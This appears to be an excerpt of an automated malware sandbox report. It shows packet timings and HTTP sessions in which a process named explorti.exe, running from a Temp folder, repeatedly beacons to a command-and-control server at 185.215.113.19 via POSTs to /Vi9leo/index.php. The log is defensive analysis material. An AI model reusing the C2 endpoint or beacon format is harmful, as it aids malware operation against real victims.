Jul 26, 2024 12:57:57.747209072 CEST	80	49756	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:57.747273922 CEST	49756	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:57.748028040 CEST	49756	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:57.752844095 CEST	80	49756	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:58.006788015 CEST	80	49756	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:58.006855965 CEST	49756	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:58.113590002 CEST	49756	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:58.113945007 CEST	49757	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:58.118859053 CEST	80	49757	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:58.118964911 CEST	49757	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:58.119093895 CEST	80	49756	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:58.119111061 CEST	49757	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:58.119148970 CEST	49756	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:58.124070883 CEST	80	49757	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:58.906789064 CEST	80	49757	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:58.906887054 CEST	49757	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:58.907546043 CEST	49757	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:58.912547112 CEST	80	49757	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:59.163927078 CEST	80	49757	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:59.164124966 CEST	49757	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:59.269922018 CEST	49757	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:59.270112991 CEST	49758	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:59.275530100 CEST	80	49758	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:59.275619030 CEST	49758	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:59.275707960 CEST	49758	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:59.277461052 CEST	80	49757	185.215.113.19	192.168.2.5
Jul 26, 2024 12:57:59.277513981 CEST	49757	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:57:59.280602932 CEST	80	49758	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:00.031244993 CEST	80	49758	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:00.031367064 CEST	49758	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:00.032094002 CEST	49758	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:00.036932945 CEST	80	49758	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:00.293641090 CEST	80	49758	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:00.293869972 CEST	49758	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:00.395083904 CEST	49758	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:00.395266056 CEST	49759	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:00.400809050 CEST	80	49759	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:00.400840998 CEST	80	49758	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:00.400909901 CEST	49759	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:00.400960922 CEST	49758	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:00.401077032 CEST	49759	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:00.406055927 CEST	80	49759	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:01.198096991 CEST	80	49759	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:01.203831911 CEST	49759	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:01.203833103 CEST	49759	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:01.209388971 CEST	80	49759	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:01.463365078 CEST	80	49759	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:01.463562012 CEST	49759	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:01.567214012 CEST	49759	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:01.567528009 CEST	49760	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:01.572849989 CEST	80	49760	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:01.572957039 CEST	49760	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:01.573024035 CEST	80	49759	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:01.573045969 CEST	49760	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:01.573082924 CEST	49759	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:01.578121901 CEST	80	49760	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:02.313822031 CEST	80	49760	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:02.313966036 CEST	49760	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:02.314673901 CEST	49760	80	192.168.2.5	185.215.113.19
Jul 26, 2024 12:58:02.319860935 CEST	80	49760	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:02.560359955 CEST	80	49760	185.215.113.19	192.168.2.5
Jul 26, 2024 12:58:02.560441017 CEST	49760	80	192.168.2.5	185.215.113.19

HTTP Request Dependency Graph

185.215.113.19

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49711	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:02.608081102 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:03.371390104 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:03.373843908 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:03.623560905 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49712	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:03.751841068 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:04.531441927 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:04.532567978 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:04.784935951 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49713	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:04.901309013 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:05.689474106 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:05.690505028 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:05.953767061 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49714	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:06.074106932 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:06.872148991 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:06.873008013 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:07.130827904 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49715	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:07.244910002 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:08.211889982 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:08.213229895 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:08.213963985 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:08.466248035 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49716	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:08.588977098 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:09.377474070 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:09.378551006 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:09.638217926 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49717	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:09.760751963 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:10.576160908 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:10.577260017 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:10.835897923 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49718	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:10.950582981 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:11.744389057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:11.747679949 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:12.151231050 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49719	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:12.262633085 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:13.137680054 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:13.138874054 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:13.399353027 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.5	49720	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
Jul 26, 2024 12:57:13.510565996 CEST	154	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Jul 26, 2024 12:57:14.295916080 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Jul 26, 2024 12:57:14.296927929 CEST	308	OUT	POST /Vi9leo/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 43 38 30 42 34 45 46 41 38 45 34 39 44 32 41 43 35 34 35 31 44 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 36 42 41 32 38 37 35 42 30 35 46 38 32 44 31 32 46 43 33 36 33 42 42 33 44 42 33 37 33 46 45 34 38 31 44 33 44 41 38 37 33 32 30 37 30 45 37 41 31 30 35 44 31 31 37 43 45 39 35 45 39 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58C80B4EFA8E49D2AC5451DB140BE1D46450FC9DDF642E3BDD70A76BA2875B05F82D12FC363BB3DB373FE481D3DA8732070E7A105D117CE95E9
Jul 26, 2024 12:57:14.546863079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 26 Jul 2024 10:57:14 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.5	49721	185.215.113.19	80	7912	C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe

Timestamp	Bytes transferred	Direction	Data
